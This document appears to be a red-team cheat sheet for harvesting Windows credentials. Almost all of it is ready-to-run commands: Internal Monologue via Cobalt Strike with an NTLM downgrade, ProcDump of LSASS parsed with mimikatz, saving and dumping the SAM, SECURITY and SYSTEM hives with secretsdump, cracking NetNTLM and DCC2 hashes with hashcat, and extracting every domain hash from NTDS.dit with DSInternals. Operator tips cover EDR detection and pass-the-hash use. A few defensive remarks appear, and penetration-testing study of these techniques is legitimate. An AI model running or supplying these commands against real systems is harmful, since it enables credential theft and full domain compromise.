Internal Monologue is a way of dumping creds without touching LSASS: it asks the local NTLM security package (via SSPI) to answer a challenge it controls, so each logged-on user's NetNTLM response can be captured without opening a handle to lsass.exe or reading its memory. When run elevated it also temporarily downgrades the NTLM settings in the registry (LMCompatibilityLevel, NTLMMinClientSec, RestrictSendingNTLMTraffic) to force a NetNTLMv1 response and restores them afterwards - a registry write defenders can alert on.
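# Run Internal Monologue in memory through the C2's .NET loader (Cobalt Strike
# execute-assembly). Replace [help] with the tool's real flags; as written it
# only prints the tool's own usage text.
# Requires a .NET 4.x target; the path points at the operator-side copy of the
# assembly, not a file on the target.
execute-assembly /root/ADShare/NET4.6.2/InternalMonologue.exe [help]

# Crack the captured responses. -m 5500 is NetNTLMv1 / NetNTLMv1+ESS, which is
# what Internal Monologue produces after a successful downgrade; if the downgrade
# did not happen the responses are NetNTLMv2 and need -m 5600 instead.
# Because the tool uses a fixed challenge (1122334455667788), a NetNTLMv1
# response without ESS can also be reversed to the raw NT hash (DES key recovery
# with hashcat -m 14000 / crack.sh, see the tool README) when the wordlist
# fails - the NT hash alone is enough for pass-the-hash.
# hashcat long options take two dashes: --force skips the device/driver
# warnings; a single-dash -force is not a valid spelling.
hashcat hashes.txt /usr/share/wordlists/rockyou.txt -m 5500 --force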
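# Dump LSASS memory with Sysinternals ProcDump (a Microsoft-signed binary).
# Needs local admin / SeDebugPrivilege. Opening a full-memory handle to
# lsass.exe is one of the most-monitored actions on a host: expect EDR to flag
# or block this even though the binary itself is trusted.
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

# The dump holds every logon's credential material (NT hashes, Kerberos keys and
# tickets, possibly cleartext). Move it off-host over an encrypted channel,
# delete it from the target when finished, and treat the copy as
# domain-admin-equivalent sensitive data.

# Parse the dump offline with mimikatz. sekurlsa::minidump needs a mimikatz
# build of the same architecture as the dump (x64 dump -> x64 mimikatz) and
# ideally runs on the same Windows version; a mismatch surfaces as parsing
# errors rather than wrong data.
mimikatz # sekurlsa::minidump /root/lsass.dmp
mimikatz # sekurlsa::logonpasswords

# Same parse from PowerShell with Invoke-Mimikatz, reading the dump from C:\lsass.dmp.
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\lsass.dmp" "sekurlsa::logonpasswords"'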
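# Save the registry hives that hold local secrets (needs local admin):
#   SYSTEM   - boot key needed to decrypt the other two
#   SECURITY - LSA secrets and the domain logon cache (MS-Cache v2 / DCC2)
#   SAM      - local account NT hashes
reg save hklm\system system
reg save hklm\security security
reg save hklm\sam sam

# Extract offline with Impacket's secretsdump (LOCAL = parse the saved hive
# files instead of a remote target). The hive files are as sensitive as the
# hashes they yield - remove them from the target when done.
python secretsdump.py -security security -system system -sam sam LOCAL

# Cracking the MS-Cache v2 (DCC2) hashes recovered from SECURITY.
# hashcat -m 2100 expects each line as:
#   $DCC2$<iterations>#<username>#<hash>
# secretsdump already emits this form, prefixed with DOMAIN/user: - strip that
# prefix and nothing else. 10240 is the Windows default iteration count; if the
# host changed NL$IterationCount the value secretsdump printed differs, so keep
# what it emitted rather than forcing 10240.
# DCC2 is PBKDF2-based and slow to crack, and cannot be used for pass-the-hash,
# so a targeted wordlist matters more here than for NT hashes.
hashcat -m 2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable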
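# Offline extraction of domain hashes from a copy of NTDS.dit plus the matching
# SYSTEM registry hive (a DC backup, a mounted DC VM disk, or a VSS/ntdsutil
# snapshot - the live ntds.dit on a running DC is locked).
# Also needs the DSInternals PowerShell module; it is a plain set of files that
# can be copied across machines and imported from any path.

# Import DSInternals from its copied location.
Import-Module C:\Users\Administrator\Documents\DS\DSInternals\4.3\DSInternals.psd1

# Grab the boot key from the SYSTEM hive. This can be done offline or against a
# mounted DC VM. The hive must be the one paired with this ntds.dit (same DC,
# same point in time); otherwise the password encryption key cannot be
# decrypted and every hash comes out wrong or empty.
$key = Get-BootKey -SystemHivePath D:\Windows\System32\config\SYSTEM

# Extract user information from NTDS.dit (every account, krbtgt included).
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key

# Extract NT hashes in hashcat's NT format - equivalent to a full DCSync.
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key |
    Format-Custom -View HashcatNT |
    Out-File vault-hashes.txt -Encoding ASCII

# The output file is every credential in the domain, krbtgt included: treat it
# as a full-domain-compromise artifact. It can be cracked or used for
# pass-the-hash exactly like DCSync output; on the defensive side any exposure
# of NTDS.dit warrants a double krbtgt rotation and a domain-wide reset.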